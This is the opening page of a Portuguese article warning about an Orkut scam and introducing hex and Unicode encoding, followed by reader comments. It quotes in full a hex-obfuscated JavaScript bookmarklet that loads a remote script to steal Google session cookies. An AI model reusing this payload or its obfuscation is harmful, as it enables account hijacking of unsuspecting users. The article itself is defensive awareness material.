Codificação e decodificação entre ASCII, hexadecimal e unicode

Sabemos que não existe vírus para Linux, mas existem crackers prontos para invadir qualquer sistema. Defenda-se desvendando mais um dos mistérios dessa turma da codificação e decodificação.

[ Hits: 51.482 ]

Por: M4iir1c10 em 01/06/2007 | Blog: https://github.com/mauricioph


Não seja vítima, defenda-se



Um certo dia estava eu navegando no orkut e recebi uma mensagem que prometia a invasão de uma conta qualquer do orkut através de um script.

Segundo o autor eu deveria entrar no perfil da pessoa escolhida e colar na barra de endereços esse código:

javascript:d=document.createElement('SCRIPT'); d.src='%68%74%74%70%3A%2F%2F%74%69%6E%79%75%72%6C%2E%63%6F %6D%2F%32%64%6E%6F%6B%32'; document.getElementsByTagName('head').item(0).appendChild(d);void(0)

Só que desconfiado como sou, resolvi fazer o seguinte, não confiar nesse script por ter no seu código hexadecimais que o navegador interpreta como caracteres normais.

Como conheço a codificação hexadecimal, resolvi traduzir esse comando, e para a surpresa de todos menos a minha, esse script faz uma chamada a outro script hospedado em uma página fora do orkut e o resultado final é:

Quando você clica nele está autorizando o script a copiar o cookie do orkut no seu computador para o computador do criador dele, dando a esse camarada acesso total à sua conta no Google... isso mesmo! Estamos falando de acesso total ao Gmail, Orkut, Google reader, etc.

Baseado nessa experiência resolvi criar um script em Java que vai codificar e decodificar as palavras para Hexadecimal e Unicode.

    Próxima página

Páginas do artigo
   1. Não seja vítima, defenda-se
   2. ASCII
   3. Hexadecimal e Unicode
   4. O código
Outros artigos deste autor

Aprendendo a melhorar os seus scripts

Instalando Beryl no Windows XP

5 comandos que ninguém nunca deve executar no Linux

Enfeite o LILO com uma imagem de seu gosto

Letras brilhantes com Gimp

Leitura recomendada

Instalando plugin do Java no Firefox 0.8

Instalando o Java Plug-in no Mozilla

Proteja seu website ou página html com encriptaçâo

Senhas seguras: algumas técnicas e script para teste

Como traduzir Software Livre - Um método fácil

  
Comentários
[1] Comentário enviado por kenshisk em 01/06/2007 - 12:38h

Ainda não entendo de javascritp então não posso comentar sobre o código mais na minha opinião alguem que executa algum código sem conhecer merece se ferrar, meu como pode executar algo que não conhece?
mais enfim esse art. vai ajudar alguns inocentes.
p.s: não interpretem mal achei bom o artigo.

[2] Comentário enviado por sclinux em 01/06/2007 - 14:40h

Parabéns pelo artigo. Muitas vezes caracteres codificados podem ser usados para "burlar" bloqueios efetuados por proxy.

[3] Comentário enviado por shocker em 03/06/2007 - 13:32h

Excelente artigo. Parabéns.

[4] Comentário enviado por evertonrs em 03/06/2007 - 21:15h

Eu acho que não tem como saber se a pessoa é do bem ou é do mal..
uma coisa é certa, sistemas hexadecimais e unicodes é mto bom..
eu amo essa parte, me interesso mto..
em fim.. mto bom esse script... valew mauricio

[5] Comentário enviado por TSM em 02/10/2007 - 15:13h

Cara sua dica vai ser muito util, valeu.

Abraços

[6] Comentário enviado por Teixeira em 20/10/2007 - 20:11h

É uma pena que "a meninada" que usa orkut, msn e outros que tais, geralmente não tenha acesso a (ou não se interesse por) artigos como esse e continue a abrir tudo quanto encontra pela frente.
Parabéns. Vou testar.

[7] Comentário enviado por edphp em 06/02/2009 - 23:36h

Parabéns pela iniciativa de ajudar pessoas que não sabem muito sobre o que um link pode fazer, ainda aproveitando para explicar coisas básicas sobre informática, mas que usuários mais novos e alguns velhos não conheçem.
Mas como todo ato bom tem sua parte má, pode ser que outas pessoas usem isso, mas creio que o pessoal aqui deve ser gente boa, talvez no máximo a idéia de executar um script ao clicar num link.


Contribuir com comentário